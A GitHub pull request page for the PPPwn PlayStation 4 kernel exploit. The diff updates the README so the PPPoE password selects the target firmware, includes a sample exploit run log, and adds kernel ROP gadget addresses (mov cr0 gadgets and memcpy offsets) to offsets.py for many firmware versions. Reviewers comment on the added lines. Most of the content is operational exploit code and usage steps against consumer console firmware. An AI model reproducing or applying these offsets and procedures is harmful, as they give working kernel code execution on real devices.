Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Use the PPPoE password to determine the system version #56

Open
wants to merge 7 commits into
base: master
Choose a base branch
from
Open

Use the PPPoE password to determine the system version #56

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
7 commits
Select commit Hold shift + click to select a range
ddad800
Use PAP to determine the system version
lordfriky May 8, 2024
7ad35f5
Remove repetitive firmware checking
lordfriky May 8, 2024
0004acc
Add username back in case a second arg is needed
lordfriky May 8, 2024
a9d257a
Add more stuff for multi FW support
Al-Azif May 8, 2024
5931098
Changes made by Celeste
lordfriky May 9, 2024
fb13fd1
Merge branch 'celeste' into celeste
lordfriky May 9, 2024
2bd7673
Merge pull request #1 from Al-Azif/celeste
lordfriky May 9, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
16 changes: 12 additions & 4 deletions README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -55,7 +55,7 @@ For other firmwares, e.g. FW 9.00, pass `FW=900`.
DO NOT RUN the exploit just yet (don't press Enter yet) but prepare this command on your prompt (see `ifconfig` for the correct interface):

```sh
sudo python3 pppwn.py --interface=enp0s3 --fw=1100
sudo python3 pppwn.py --interface=enp0s3 [--fw=1100]
```

For other firmwares, e.g. FW 9.00, pass `--fw=900`.
Expand All @@ -65,18 +65,20 @@ On your PS4:
- Go to `Settings` and then `Network`
- Select `Set Up Internet connection` and choose `Use a LAN Cable`
- Choose `Custom` setup and choose `PPPoE` for `IP Address Settings`
- Enter anything for `PPPoE User ID` and `PPPoE Password`
- Enter anything for `PPPoE User ID`
- Enter PS4/PS5 System Software version (e.g 900 for 9.00) for `PPPoE Password`
Copy link
Owner

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Why PS5??

- Choose `Automatic` for `DNS Settings` and `MTU Settings`
- Choose `Do Not Use` for `Proxy Server`

- Now, simultaneously press the 'X' button on your controller on `Test Internet Connection` and 'Enter' on your keyboard (on the computer you have your Python script ready to run).

ALWAYS wait for you console to show the message "Cannot connect to network: (NW-31274-7)" before trying this PPOE injection again.
ALWAYS wait for your PS4 to show the message "Cannot connect to network. (NW-31274-7)" before trying this PPPoE injection again.

If the exploit fails or the PS4 crashes, you can skip the internet setup and simply click on `Test Internet Connection`. Kill the `pppwn.py` script and run it again on your computer, and then click on `Test Internet Connection` on your PS4: always simultaneously.

If your PS4 displays the error "The PPPoE user ID or password is not correct. (NW-31273-6)", then the PS4/PS5 System Software version specified as `PPPoE Password` is invalid.

If the exploit works, you should see an output similar to below, and you should see `Cannot connect to network.` followed by `PPPwned` printed on your PS4, or the other way around.
If the exploit works, you should see a console output similar to below, and a `Cannot connect to network.` notification on your PS4, followed by a `PPPwned` notification, or the other way around.

### Example run

Expand All @@ -97,6 +99,12 @@ If the exploit works, you should see an output similar to below, and you should
[*] Sending LCP configure ACK...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for PAP authentication request...
[+] PAP username: me
[+] PAP password: 1337
[-] Unknown System Software version specified on PS4/PS5.
[+] Selected System Software version: 1100
[*] Sending PAP authentication ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
Expand Down
53 changes: 50 additions & 3 deletions offsets.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -17,14 +17,19 @@ class OffsetsFirmware_750_755:

MEMCPY = 0xffffffff8248f800

# Not available on FW >= 6.50
# 0xffffffff82200000 : mov cr0, rsi ; mov eax, 1 ; ret
MOV_CR0_RSI_MOV_EAX_1_RET = 0xffffffff82200000

# Not necessary on FW < 6.50
# 0xffffffffe19d9cf9 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret
MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff825a2589

SECOND_GADGET_OFF = 0x3b

# 0xffffffff824095e7 : jmp qword ptr [rsi + 0x3b]
FIRST_GADGET = 0xffffffff824095e7

# 0xffffffff82c90516 : push rbp ; jmp qword ptr [rsi]
PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c90516

Expand Down Expand Up @@ -57,7 +62,7 @@ class OffsetsFirmware_750_755:

# 0xffffffff82227fa7 : pop r8 ; pop rbp ; ret
POP_R8_POP_RBP_RET = 0xffffffff82227fa7

# 0xffffffff827dc32f : pop r12 ; ret
POP_R12_RET = 0xffffffff827dc32f

Expand Down Expand Up @@ -111,6 +116,11 @@ class OffsetsFirmware_800_803:

MEMCPY = 0xffffffff8245e1c0

# Not available on FW >= 6.50
# 0xffffffff82200000 : mov cr0, rsi ; mov eax, 1 ; ret
MOV_CR0_RSI_MOV_EAX_1_RET = 0xffffffff82200000

# Not necessary on FW < 6.50
# 0xffffffff82660609 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret
MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff82660609

Expand Down Expand Up @@ -205,6 +215,11 @@ class OffsetsFirmware_850_852:

MEMCPY = 0xffffffff825a40f0

# Not available on FW >= 6.50
Copy link
Owner

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Why do you have these comments

Copy link
Contributor

@Al-Azif Al-Azif May 13, 2024
edited
Loading

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pre 6.50 you don't have the ud2 in that gadget, we can actually remove the MOV_CR0_RSI_MOV_EAX_1_RET gadget from FW >=6.50 and the MOV_CR0_RSI_UD2_MOV_EAX_1_RET from FW < 6.50. I just had them there when I was working on stuff so I could keep stuff straight, they're just the base @ ffffffff82200000 as a placeholder.

Or we can remove the conditional when the gadget is used and just use one of them for both (variable name won't match contents).

Copy link
Owner

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Well please remove them

# 0xffffffff82200000 : mov cr0, rsi ; mov eax, 1 ; ret
MOV_CR0_RSI_MOV_EAX_1_RET = 0xffffffff82200000

# Not necessary on FW < 6.50
# 0xffffffff823ce849 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret
MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff823ce849

Expand Down Expand Up @@ -299,6 +314,11 @@ class OffsetsFirmware_900:

MEMCPY = 0xffffffff824714b0

# Not available on FW >= 6.50
# 0xffffffff82200000 : mov cr0, rsi ; mov eax, 1 ; ret
MOV_CR0_RSI_MOV_EAX_1_RET = 0xffffffff82200000

# Not necessary on FW < 6.50
# 0xffffffff823fb949 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret
MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff823fb949

Expand Down Expand Up @@ -392,6 +412,11 @@ class OffsetsFirmware_903_904:

MEMCPY = 0xffffffff82471130

# Not available on FW >= 6.50
# 0xffffffff82200000 : mov cr0, rsi ; mov eax, 1 ; ret
MOV_CR0_RSI_MOV_EAX_1_RET = 0xffffffff82200000

# Not necessary on FW < 6.50
# 0xffffffff823fb679 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret
MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff823fb679

Expand Down Expand Up @@ -486,6 +511,12 @@ class OffsetsFirmware_950_960:

MEMCPY = 0xffffffff82401cc0

# Not available on FW >= 6.50
# 0xffffffff82200000 : mov cr0, rsi ; mov eax, 1 ; ret
MOV_CR0_RSI_MOV_EAX_1_RET = 0xffffffff82200000

# Not necessary on FW < 6.50
# 0xffffffff822bea79 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret
MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff822bea79

SECOND_GADGET_OFF = 0x3b
Expand Down Expand Up @@ -579,6 +610,11 @@ class OffsetsFirmware_1000_1001:

MEMCPY = 0xffffffff82672d20

# Not available on FW >= 6.50
# 0xffffffff82200000 : mov cr0, rsi ; mov eax, 1 ; ret
MOV_CR0_RSI_MOV_EAX_1_RET = 0xffffffff82200000

# Not necessary on FW < 6.50
# 0xffffffff82376089 : mov cr0 rsi ; ud2 ; mov eax 1; ret
MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff82376089

Expand Down Expand Up @@ -673,6 +709,12 @@ class OffsetsFirmware_1050_1071:

MEMCPY = 0xffffffff822d7370

# Not available on FW >= 6.50
# 0xffffffff82200000 : mov cr0, rsi ; mov eax, 1 ; ret
MOV_CR0_RSI_MOV_EAX_1_RET = 0xffffffff82200000

# Not necessary on FW < 6.50
# 0xffffffff82285f39 : mov cr0 rsi ; ud2 ; mov eax 1; ret
MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff82285f39

SECOND_GADGET_OFF = 0x3b
Expand Down Expand Up @@ -766,6 +808,11 @@ class OffsetsFirmware_1100:

MEMCPY = 0xffffffff824dddf0

# Not available on FW >= 6.50
# 0xffffffff82200000 : mov cr0, rsi ; mov eax, 1 ; ret
MOV_CR0_RSI_MOV_EAX_1_RET = 0xffffffff82200000

# Not necessary on FW < 6.50
# 0xffffffff824f1299 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret
MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff824f1299

Expand Down
Loading